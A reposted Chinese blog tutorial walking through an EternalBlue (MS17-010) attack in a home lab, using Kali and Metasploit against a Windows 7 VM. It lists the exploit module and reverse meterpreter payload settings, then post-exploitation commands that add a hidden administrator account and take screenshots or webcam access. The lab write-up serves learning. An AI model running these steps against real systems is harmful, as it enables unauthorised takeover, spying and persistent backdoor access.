0


网络攻防——永恒之蓝

永恒之蓝

1.引言

    让一个不爱学习的人整天蒙英语题,听张宇的视频实在是枯燥了点,于是决定看看网安,积累积累一些有趣的玩意儿。然后,自己不是专业的,也不是为了工作,可能会查阅大佬的博文,然后把概念借鉴过来,会留下参考链接的,如果博主不同意引用直接评论我会删除的。好,引用张宇一句话:直接来吧。

2.永恒之蓝定义

    永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该程序出来不久就被微软通过打补丁修复。之后在windows7以上的版本中不再出现了。当年的攻击效果如下(找网安大佬要的图):
在这里插入图片描述

3.SMB协议

    SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

3.windows7版本说明

    我们都知道家庭版和专业版,直白点就是普通和高级,普通提供的功能有限。但是windows7里面还有一个旗舰版。其实对于专业版和旗舰版,两者只是功能上有少量差别,如果把Windows7旗舰版的BitLocker功能(

BitLocker驱动器加密通过加密Windows操作系统卷上存储的所有数据可以更好地保护计算机中的数据

)和35种语言之间任意切换功能去掉其实就等于是专业版。

4.攻击实例

4.1攻击者和被攻击者展示

(1)攻击机:kali
在这里插入图片描述

(2)靶机:windows7旗舰版
在这里插入图片描述

4.2详细攻击过程

(1)首先通过

ifconfig

ipconfig

分别查看kali和windows7的ip地址:

kali:192.168.58.132
windows7:192.168.58.134

(2)利用kali

ping

windows7,发现ping不通,于是关闭windows7的防火墙,再ping就能够ping通了,说明二者能够建立连接;
(3)输入如下指令打开kali数据库:

service postgresql status //查看数据库开启状态
service postgresql start //开启数据库
service postgresql status //再次查看数据库开启状态,确认开启

开启效果如下:
在这里插入图片描述
(4)数据库初始化:

msfdb init

(5)启动msf:

msfconsole

(6)搜索ms17_010漏洞(也就是永恒之蓝漏洞):

search ms17_010

    这个时候系统会展示kali中可以使用的扫描模块:
在这里插入图片描述
(7)选择扫描模块:

use auxiliary/scanner/smb/smb_ms17_010

(8)开始扫描:

use exploit/windows/smb/ms17_010_eternalblue

(9)设置本次扫描基本配置:

//设置扫描的靶机ipset rhost 192.168.58.134//设置携带的攻击载荷set payload windows/x64/meterpreter/reverse_tcp
//设置监听的攻击机set lhost 192.168.58.132

(10)利用exploit进行攻击:

exploit

    回到windows7中查看,虽然关闭了防火墙,但是受到永恒之蓝攻击之后windows7还是能够报危险提示的:
在这里插入图片描述
接下来可以进行一系列攻击了,给出几个例子:
(1)查看系统信息:

sysinfo

(2)创造出一个新的管理员出来

//创建用户
net user hack 123456/add
//将用户升级为管理员
net localgroup administrators hack /add 

    但是其实有点尬,这样用户就能一眼看出来有多个用户了:
在这里插入图片描述
    由于第一个用户自带管理员权限,因此,如果用户很懂的话,可以直接在管理用户的地方删除用户:
在这里插入图片描述
    当然上面介绍的可能太专业了,之前在kali的基本使用中介绍了使用

webcam_list

webcam_stream

打开摄像头,但是虚拟机的旗舰版windows7直接提示没有摄像头,绷不住了。
    但是可以使用

screenshot

截个图。截图之后会提示文件的位置,但是这里直接找了半天都没看到,和前面介绍的windows攻击程序的生成位置一样,可能是出现在root目录下,因此,桌面右键,

open as Root

然后去根目录下查看,注意直接切换用户是不能够进入root的,会直接提示密码错误:
在这里插入图片描述

4.3接下来尝试攻击一下windows10

    所有操作一样,只是换一下ip地址:
在这里插入图片描述
确实攻击不了。

5.参考文献

(1)永恒之蓝漏洞利用及攻击

标签: 网络 安全 服务器

本文转载自: https://blog.csdn.net/weixin_46560512/article/details/123364016
版权归原作者 凌空暗羽 所有, 如有侵权,请联系我们删除。

“网络攻防——永恒之蓝”的评论:

还没有评论